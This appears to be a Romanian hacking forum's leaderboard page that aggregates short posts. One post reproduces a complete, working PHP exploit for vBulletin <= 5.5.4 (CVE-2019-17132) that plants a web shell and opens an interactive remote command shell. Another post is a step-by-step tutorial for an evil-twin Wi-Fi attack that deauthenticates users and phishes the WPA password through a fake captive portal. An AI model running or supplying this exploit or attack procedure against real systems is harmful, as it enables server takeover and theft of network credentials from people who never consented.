Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 10/08/19 in all areas

  1. Nu stiu ce ma face sa cred ca esti oltean ....
    1 point
  2. kali e o distributie, nu un sistem de operare. 1. e o copie 2. e facuta special pe placul copiilor Imi plange laptopul la ce topicuri sunt aici in ultima perioada Hai sa facem o strangere de mana si apoi un three fingers salute.
    1 point
  3. <?php /* --------------------------------------------------------------------- vBulletin <= 5.5.4 (updateAvatar) Remote Code Execution Vulnerability --------------------------------------------------------------------- author..............: Egidio Romano aka EgiX mail................: n0b0d13s[at]gmail[dot]com software link.......: https://www.vbulletin.com/ +-------------------------------------------------------------------------+ | This proof of concept code was written for educational purpose only. | | Use it at your own risk. Author will be not responsible for any damage. | +-------------------------------------------------------------------------+ [-] Vulnerability Description: User input passed through the "data[extension]" and "data[filedata]" parameters to the "ajax/api/user/updateAvatar" endpoint is not properly validated before being used to update users' avatars. This can be exploited to inject and execute arbitrary PHP code. Successful exploitation of this vulnerability requires the "Save Avatars as Files" option to be enabled (disabled by default). [-] Disclosure timeline: [30/09/2019] - Vendor notified [03/10/2019] - Patch released: https://bit.ly/2OptAzI [04/10/2019] - CVE number assigned (CVE-2019-17132) [07/10/2019] - Public disclosure */ set_time_limit(0); error_reporting(E_ERROR); if (!extension_loaded("curl")) die("[-] cURL extension required!\n"); print "+-------------------------------------------------------------------------+"; print "\n| vBulletin <= 5.5.4 (updateAvatar) Remote Code Execution Exploit by EgiX |"; print "\n+-------------------------------------------------------------------------+\n"; if ($argc != 4) { print "\nUsage......: php $argv[0] <URL> <Username> <Password>\n"; print "\nExample....: php $argv[0] http://localhost/vb/ user passwd"; print "\nExample....: php $argv[0] https://vbulletin.com/ evil hacker\n\n"; die(); } list($url, $user, $pass) = [$argv[1], $argv[2], $argv[3]]; $ch = curl_init(); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_HEADER, true); print "\n[-] Logging in with username '{$user}' and password '{$pass}'\n"; curl_setopt($ch, CURLOPT_URL, $url); if (!preg_match("/Cookie: .*sessionhash=[^;]+/", curl_exec($ch), $sid)) die("[-] Session ID not found!\n"); curl_setopt($ch, CURLOPT_URL, "{$url}?routestring=auth/login"); curl_setopt($ch, CURLOPT_HTTPHEADER, $sid); curl_setopt($ch, CURLOPT_POSTFIELDS, "username={$user}&password={$pass}"); if (!preg_match("/Cookie: .*sessionhash=[^;]+/", curl_exec($ch), $sid)) die("[-] Login failed!\n"); print "[-] Logged-in! Retrieving security token...\n"; curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_POST, false); curl_setopt($ch, CURLOPT_HTTPHEADER, $sid); if (!preg_match('/token": "([^"]+)"/', curl_exec($ch), $token)) die("[-] Security token not found!\n"); print "[-] Uploading new avatar...\n"; $params = ["profilePhotoFile" => new CURLFile("avatar.jpeg"), "securitytoken" => $token[1]]; curl_setopt($ch, CURLOPT_URL, "{$url}?routestring=profile/upload-profilepicture"); curl_setopt($ch, CURLOPT_POSTFIELDS, $params); curl_setopt($ch, CURLOPT_HEADER, false); if (($path = (json_decode(curl_exec($ch)))->avatarpath) == null) die("[-] Upload failed!\n"); if (preg_match('/image\.php\?/', $path)) die("[-] Sorry, the 'Save Avatars as Files' option is disabled!\n"); print "[-] Updating avatar with PHP shell...\n"; $php_code = '<?php print("____"); passthru(base64_decode($_SERVER["HTTP_CMD"])); ?>'; $params = ["routestring" => "ajax/api/user/updateAvatar", "userid" => 0, "avatarid" => 0, "data[extension]" => "php", "data[filedata]" => $php_code, "securitytoken" => $token[1]]; curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params)); if (curl_exec($ch) !== "true") die("[-] Update failed!\n"); print "[-] Launching shell...\n"; preg_match('/(\d+)\.jpeg/', $path, $m); $path = preg_replace('/(\d+)\.jpeg/', ($m[1]+1).".php", $path); curl_setopt($ch, CURLOPT_URL, "{$url}core/{$path}"); curl_setopt($ch, CURLOPT_POST, false); while(1) { print "\nvb-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; curl_setopt($ch, CURLOPT_HTTPHEADER, ["CMD: ".base64_encode($cmd)]); preg_match('/____(.*)/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n"); } Sursa: http://karmainsecurity.com/pocs/CVE-2019-17132
    1 point
  4. contactme bro im have good software and use is free!!
    1 point
  5. logic cum ai vrea sa traduc ,,handshake" daca vrei pun si handshake
    -1 points
  6. daca vrei pun si in engleza dar este un forum in romana si app articolul a fost facut de mine in engleza nu trebuie sa judeci o carte dupa coperta
    -1 points
  7. si 2...ce plm e asta? https://8ez.com/8xs kali download? kali Linux sistem de operare pentru hacking
    -1 points
  8. pentru ca asa vreau eu
    -1 points
  9. În acest post vă voi învăța un mod de hacking Wi-Fi FĂRĂ folosirea tehnicilor de forță brută! Există o mulțime de cerințe prealabile necesare cu terminologia și, vă rog, nu uitați, acest lucru nu va funcționa, deoarece nu toți oamenii sunt suficient de nebuni să se încadreze în acest sens. Cu toate acestea, cel mai probabil va funcționa, așa că vă rugăm să nu vă puneți în dificultate și nu sunt responsabil pentru nimic ce faceți! Luați acest post ca cunoștințe În primul rând, veți avea nevoie de o Mașină Virtuală sau un computer care rulează orice tip de Linux, de preferință Kali Linux: Kali Linux | Penetration Testing and Ethical Hacking Linux Distribution După ce aveți asta, continuați să descărcați instrumentul: jefuitor Deci, înainte de a începe, vă voi explica cum funcționează acest instrument: • Scanați rețelele. • Capturați o strângere de mână (nu poate fi utilizată fără o strângere de mână validă, este necesar să verificați parola) • Utilizați interfața WEB • Lansați o instanță FakeAP pentru a imita punctul de acces inițial â € ¢ Procesează un proces MDK3, care deutentifică toți utilizatorii conectați la rețeaua țintă, astfel încât aceștia pot fi ademeniți să se conecteze la Fake-AP și să introducă parola WPA. • Un server DNS fals este lansat pentru a capta toate cererile DNS și redirecționarea acestora către gazda care rulează scriptul • Un portal captiv este lansat pentru a servi o pagină, ceea ce îi solicită utilizatorului să introducă parola WPA • Fiecare parolă trimisă este verificată de strângerea de mână capturată mai devreme â € ¢ Atacul se va încheia automat, de îndată ce este trimisă o parolă corectă TLDR: Scanează Wi-Fi, captează un pachet care este folosit pentru autentificarea parolei, apoi creează un punct de acces Wi-Fi „Fake” care acționează ca cel original și îi aruncă simultan pe toți de pe rețeaua inițială. Acest lucru face ca oamenii să se alăture punctului dvs. de acces fals în loc de punctul de acces real. Apoi, atunci când vor accesa punctul tău wireless fals, vor fi întâmpinați cu un „login” care necesită să-și pună datele de autentificare Wi-Fi, care apoi sunt trimise la tine prin validarea pachetului de captare pe care l-ai luat la început. Acum aveți acces la rețeaua Wi-Fi! Acum, această tehnică nu este întotdeauna garantată să funcționeze, ci este o metodă de inginerie socială! (Trucuri persoane) Îți recomand să îți direcționezi mai întâi propria rețea pentru a juca cu ea și să o testezi mai întâi înainte de a o încerca pe țintă. -------------------------------------------------- ------------------------ Pasi ------------------------- -------------------------------------------------- - PASUL 1: https://i.imgur.com/C4xoWI3.png Selectați toate canalele pentru a căuta Wi-Fi PASUL 2: https://i.imgur.com/dZ18Wf4.png Găsiți-vă rețeaua Wi-Fi țintă PASUL 3: https://i.imgur.com/B4IIdBc.png Alegeți prima opțiune pentru conexiune medie și a doua pentru conexiune mai lentă PASUL 4: https://i.imgur.com/7n5KDw4.png PASUL 5: https://i.imgur.com/Ha5r0U1.png PASUL 6: https://i.imgur.com/ufJrNvs.png Alegeți ambele, vedeți care funcționează mai bine, încercați primul, apoi încercați mkdr3. (Ambele ar trebui să funcționeze bine) PASUL 7: https://i.imgur.com/U4uT8yR.png PASUL 8: după așteptarea 1-2 minute; https://i.imgur.com/Krk0Q2M.png PASUL 9: https://i.imgur.com/gpLXeHh.png Acesta este punctul din ghid, după care trebuie să vă alegeți interfața web. Spuneți că sunteți în Australia, un mare furnizor de internet este Telstra. Există câteva interfețe web premade disponibile pentru selecție. PASUL 10: https://i.imgur.com/Ege9NDL.png PASUL 11: https://i.imgur.com/3BG17cb.png PASUL 12: https://i.imgur.com/QZZdghc.png Iată cele două rețele, dintre care una inaccesibilă (cea reală) și a ta (cea falsă) PASUL 13: https://i.imgur.com/KVE7CJO.png Dacă reușește, ținta va introduce parola WPA pe site-ul fals, care apoi vă va fi redirecționat. PASUL 14: https://i.imgur.com/GUVFgyt.png Dacă are succes, această fereastră va apărea. Apoi, puteți prelua parola din folderul salvat din directorul dvs. / root / .. Eu am fost JJ4TheHack...probabil am fost de folos
    -1 points
×
×
  • Create New...